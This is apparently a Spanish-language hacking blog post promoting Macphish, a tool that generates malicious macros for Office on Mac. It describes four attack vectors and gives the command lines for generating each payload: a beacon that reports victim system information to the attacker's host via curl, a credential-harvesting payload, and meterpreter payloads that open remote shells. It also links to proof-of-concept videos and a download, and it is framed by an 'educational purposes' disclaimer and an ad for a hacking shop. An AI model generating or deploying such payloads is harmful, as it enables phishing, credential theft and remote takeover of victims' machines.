Macphish – Generador de macros para office de Mac

0
1652
views

Generador de macros para office de Mac

Vectores de ataque

Hay 4 vectores de ataque disponibles:

  • Beacon
  • creds
  • meterpreter
  • meterpreter-grant

Para el método ‘creds’, macphish puede generar el script Applescript directamente, en caso de que necesite ejecutarlo desde un shell.

Beacon
En la ejecución, este payload será la señal de nuestro host de escucha y proporcionar información básica del sistema sobre la víctima. La forma más sencilla de generar un beacon payload es:

$./macphish.py -lh

De forma predeterminada, utiliza curl pero se pueden utilizar otras utilidades (wget, nslookup) modificando la plantilla de comandos.

Creds

$./macphish.py -lh  -lp  -a creds

Meterpreter
La manera más simple de generar un payload de meterpreter es:

$./macphish.py -lh  -lp  -p  -a meterpreter

Meterpreter-grant
Generar un payload meterpreter que llama a GrantAccessToMultipleFiles () primero:

$./macphish.py -lh  -lp  -p  -a meterpreter-grant

Para los ataques meterpreter, sólo los payloads de python son compatibles en este momento.

Modo de uso

https://github.com/cldrn/macphish/wiki/Usage

 

PoCs

  • https://drive.google.com/file/d/0BzPR8exG0kt6TlY1UWhiemVKRnc/view
  • https://drive.google.com/file/d/0BzPR8exG0kt6WWUzU0tKUjFhdjg/view
  • https://drive.google.com/file/d/0BzPR8exG0kt6VzlaWVVJdEtNR0k/view
  • https://drive.google.com/file/d/0BzPR8exG0kt6SnJwM01KSzAzMjA/view

Descarga Macphish

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop